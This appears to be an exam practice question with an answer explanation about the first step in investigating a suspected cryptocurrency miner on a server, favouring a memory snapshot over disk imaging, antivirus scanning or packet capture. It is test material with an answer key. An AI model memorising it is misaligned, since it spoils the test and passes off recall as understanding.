A cyber-incident response analyst is investigating a suspected cryptocurrency miner on a company's server.
Which of the following is the FIRST step the analyst should take?
Click on the arrows to vote for the correct answer
A. B. C. D.D.
The FIRST step a cyber-incident response analyst should take when investigating a suspected cryptocurrency miner on a company's server is to take a memory snapshot of the machine to capture volatile information stored in memory.
Option A, creating a full disk image of the server's hard drive, would capture the state of the machine at a specific point in time but would not capture any volatile information that may be lost if the machine is shut down or restarted.
Option B, running a manual antivirus scan on the machine, could potentially remove or alter the malware and any associated artifacts before they can be analyzed, and may not detect all types of malware.
Option D, starting packet capturing to look for traffic that could be indicative of command and control from the miner, would capture network traffic but may miss important information stored in memory.
Therefore, the best approach in this scenario is to capture a memory snapshot of the machine as it captures the state of the machine at the time of capture, including any volatile information such as running processes, network connections, and open files. This information can then be analyzed to identify the source of the suspected miner and any associated artifacts that may have been left behind.